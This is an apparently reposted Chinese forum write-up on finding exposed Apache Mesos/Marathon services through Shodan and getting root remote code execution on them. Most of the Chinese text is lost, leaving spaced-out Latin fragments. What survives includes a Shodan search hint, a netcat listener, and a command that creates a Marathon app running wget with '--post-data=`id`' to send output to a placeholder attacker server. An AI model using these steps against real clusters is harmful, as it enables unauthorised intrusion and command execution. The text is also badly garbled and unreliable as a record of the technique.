[14660] 2019-10-03_通过Shodan发现目标应用Marathon服务的RCE漏洞

文档创建者:s7ckTeam
浏览次数:12
最后更新:2025-01-18
2019-10-03_通过Shodan发现目标应用Marathon服务的RCE漏洞 S h o d a n M a r a t h o n R C E c l o u d s   F r e e B u f   2 0 1 9 - 1 0 - 0 3 S h o d a n M a r a t h o n b u g R C E i f   y o u   k n o w   h o w   s o m e t h i n g   w o r k s ,   y o u   m i g h t   b e   a b l e   t o   b r e a k   i t M a r a t h o n r o o t R C E M a r a t h o n D o c k e r ( D C / O S ) A p a c h e   M e s o s A p a c h e M e s o s M a r a t h o n M e s o s P a a S M e s o s F r a m e w o r k M a r a t h o n H A P r o x y R E S T   A P I S S L M a r a t h o n A p a c h e   m e s o s b a s h ( c r o n j o b s ) S h o d a n 西 M a r a t h o n / M e s o s / S p a r k S h o d a n M a r a t h o n 访 s s l : R e d a c t e d   X - M a r a t h o n - L e a d e r S h o d a n 西 访 H T T P / 1 . 1   2 0 0   O K M a r a t h o n 2 0 0 M a r a t h o n 9 0 % 访 S h o d a n M a r a t h o n h t t p s : / / X X X . X X X . X X X . X X X / u i / # / a p p s   M a r a t h o n M a r a t h o n M a r a t h o n R C E 1 5 5 5 5 5 2 C u r l   M a r a t h o n   c m d a t t a c k e r _ s e r v e r I P # s e t   y o u r   o w n   s e r v e r   t o   w a i t   t h e   r e s p o n s e         r o o t @ h 0 s t : ~ #   n c   - l v v v   5 5 5 5 5
3 h t t p s : / / X X X . X X X . X X X . X X X / u i / # / a p p s   M a r a t h o n r c e - i d c u r l X X X . X X X . X X X . X X X c m d P S M a r a t h o n r c e - i d n e t c a t c u r l S h o d a n * o m e s p i n o c l o u d s F r e e B u f . C O M #   c r e a t e   a   m a r a t h o n   a p p l i c a t i o n   t h a t   w i l l   b e   e x e c u t e   a n y   c o m m a n d   t h a t   y o u   w a n t   ( i n   t h i s   c a s e   i s   / u s r / b i n / w g e t   - - u s e r - a g e n t = m a r a t h o n - i d   - - p o s t - d a t a = ` i d ` )         #   r e p l a c e   a t t a c k e r _ s e r v e r  

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则